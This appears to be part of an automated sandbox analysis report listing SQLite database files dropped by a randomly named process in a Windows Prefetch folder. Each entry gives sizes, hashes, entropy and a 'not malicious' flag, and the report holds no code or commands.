                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
